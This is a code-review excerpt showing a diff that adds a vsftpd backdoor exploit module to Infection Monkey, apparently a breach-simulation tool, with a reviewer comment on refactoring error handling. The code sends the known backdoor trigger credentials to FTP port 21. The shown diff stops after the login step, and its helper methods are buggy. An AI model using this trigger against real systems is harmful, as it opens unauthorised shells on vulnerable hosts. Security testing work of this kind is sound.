monkey/infection_monkey/exploit/vsftpd.py

```diff
@@ -0,0 +1,163 @@
+import StringIO
+import logging
+import paramiko
+import socket
+import time
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import build_monkey_commandline
+from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
+from infection_monkey.model import MONKEY_ARG
+from infection_monkey.network.tools import check_tcp_port
+from logging import getLogger
+
+LOG = getLogger(__name__)
+
+__author__ = 'D3fa1t'
+
+FTP_PORT = 21
+TRANSFER_UPDATE_RATE = 15
+USERNAME = b'USER letmein:)\n'
+PASSWORD = b'PASS please\n'
+DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder
+
+
+class VSFTPDExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux']
+    
+    def __init__(self, host):
+        self._update_timestamp = 0
+        super(VSFTPDExploiter, self).__init__(host)
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+
+    def socket_connect(s,ip_addr,port):
+        try:
+            s.connect((ip_addr,port))
+            return True
+        except socket.error as e:
+            LOG.error('Failed to connect to %s' , self.host.ip_addr)
+        
+        return False 
+
+    def socket_send_recv(s,message):
+        try:
+            s.send(message)
+            return s.recv(128).decode('utf-8')
+            
+        except socket.error as e:
+            LOG.error('Failed to send payload to %s' , self.host.ip_addr)
+
+        return False
+
+    def socket_send(s,message):
+        try:
+            s.send(message)
+            return True
+            
+        except socket.error as e:
+            LOG.error('Failed to send payload to %s' , self.host.ip_addr)
+
+        return False
+
+
+
+    def exploit_host(self):
+        
+        LOG.info('Attempting to trigger backdoor...')
+        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            
+        if socket_connect(ftp_socket,self.host.ip_addr, FTP_PORT):
+            ftp_socket.recv(128).decode('utf-8')
+
+        # Attempt to login to trigger backdoor
+            
+        if socket_send_recv(ftp_socket,USERNAME):
```

Comment:
We need to somehow solve the code duplication  and nested if blocks of `if ... else LOG.error(something); return False`.
Refactor to: `if not socket_send_recv(ftp_socket,USERNAME): return self.log_error('Failed to trigger backdoor on %s' , self.host.ip_addr)`
And define a function `log_error(error_string)` that would log the error and return false.